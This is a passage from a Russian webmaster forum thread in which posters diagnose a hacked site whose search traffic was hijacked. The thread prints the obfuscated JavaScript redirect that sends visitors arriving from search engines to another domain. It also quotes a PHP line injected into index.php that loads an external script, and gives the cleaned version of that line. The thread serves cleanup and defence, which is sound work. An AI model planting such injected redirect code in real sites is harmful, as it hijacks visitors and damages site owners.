Сегодня посещаемость упала на 70%
Страницы: Пред. 1 2 3 4 5 6 ... 8 След.
Сегодня посещаемость упала на 70%, Сегодня посещаемость в Яндексе упала на 70%
Может конечно и реально сделать самому , но сколько времени пройдет
бр бр бр
Итак, сайт http://promediagroup.ru/ тут тоже не причем, судя по всему он взломан таким же образом. Вредоносный код у них сидит в ява скрипте.

Значит, ваш сайт каким то образом ссылается на них, грузит редирект с их зараженного сайта, и редиректит на сайт злоумышленника.

Вот содержимое их редиректа:

Код
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(une scape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.searchlots-all.ru/%27+%27%3Fwkey%3D"+l('9d837')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}


Как видите,в нем прописаны рефереры поисковых систем.
На будущее - поставьте в панели управления хостингом полный бекап хотя бы раз в три дня, а лучше каждый день. Из бекапа все можно восстановить в первозданный вид (если бекап чист).
Я незнаю как это делается
TEJlO11, скачай файл index.php себена комп, открой его и в самом низу увидешь
Цитата
$tpl->compile ( 'main' );
$tpl->result['main'] = str_replace ( '{THEME}', $config['http_home_url'] . 'templates/' . $config['skin'], $tpl->result['main'] );
if ($replace_url) $tpl->result['main'] = str_replace ( $replace_url[0]."/", $replace_url[1]."/", $tpl->result['main'] );
$tpl->result['main'] = str_replace ( 'img src="http://'.$_SERVER['HTTP_HOST'].'/', 'img src="/', $tpl->result['main'] );

echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);
$tpl->global_clear ();
$db->close ();

GzipOut ();
?>

замени на
Цитата
$tpl->compile ( 'main' );
$tpl->result['main'] = str_replace ( '{THEME}', $config['http_home_url'] . 'templates/' . $config['skin'], $tpl->result['main'] );
if ($replace_url) $tpl->result['main'] = str_replace ( $replace_url[0]."/", $replace_url[1]."/", $tpl->result['main'] );
$tpl->result['main'] = str_replace ( 'img src="http://'.$_SERVER['HTTP_HOST'].'/', 'img src="/', $tpl->result['main'] );

echo $tpl->result['main'];
$tpl->global_clear ();
$db->close ();

GzipOut ();
?>

и все
Нет у него такого

Цитата
echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);


TEJlO11, если будешь открывать index.php, не открывай блокнотом, открывай ТоталКоммандером.
Изменено: hebroid - 3 Июля 2011 01:11
сейчас скачаю командер
hebroid, должен быть у меня такая же проблема как и у него...
Нет такого в index.php
можешь выложить куда нибудь свой индекс.пхп?
Кажется, нашел зацепку.
http://ifolder.ru/24502293
Не стоило выкладывать.

В index.php ничего не видно.

В исходном коде страницы все видно. Вот эта бяка, аккурат после <boby> сидит:

Цитата
<sc ript src=http://promediagroup.ru/d.js></script><sc ript language="javascript" type="text/javascript">
TEJlO11, хм... ни чего такого нету... может в маин.тпл какой код вставили или в .htaccess попробуй там поискать
И где ее искать не знаешь?
Страницы: Пред. 1 2 3 4 5 6 ... 8 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:39 Подскажите где продвигать сайт. 
10:57 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
19:12 Мошенники-копирайтеры 
08:57 Индексация страниц 
23:16 Есть ли альтернатива Адсенсу и РСЯ? 
20:48 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
18:53 Настройка плагина для wordpress Price Shop 
16:55 SpaceSwap.cc - Быстрый и надежный обменник криптовалют 
16:45 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
15:51 Обменник криптовалют Saint-Exchange 
15:15 Affiliate Top - партнерская программа нового уровня 
14:02 garantcoin.io - быстрый и надёжный сервис обмена криптовалюты GarantCoin 
04:12 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
01:28 4money.me—сервис для быстрого и удобного обмена криптовалют 
10:26 Новости искусственного интеллекта 
04:26 Хром ругается на форум 
03:49 Точные прогнозы на футбол 
18:41 С юмором по жизни! 
14:22 SENDERSEX.COM - Тизерная партнёрка онлайн игры Эротические Фанты Онлайн 
20:32 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
09:37 Договорные матчи от ИИ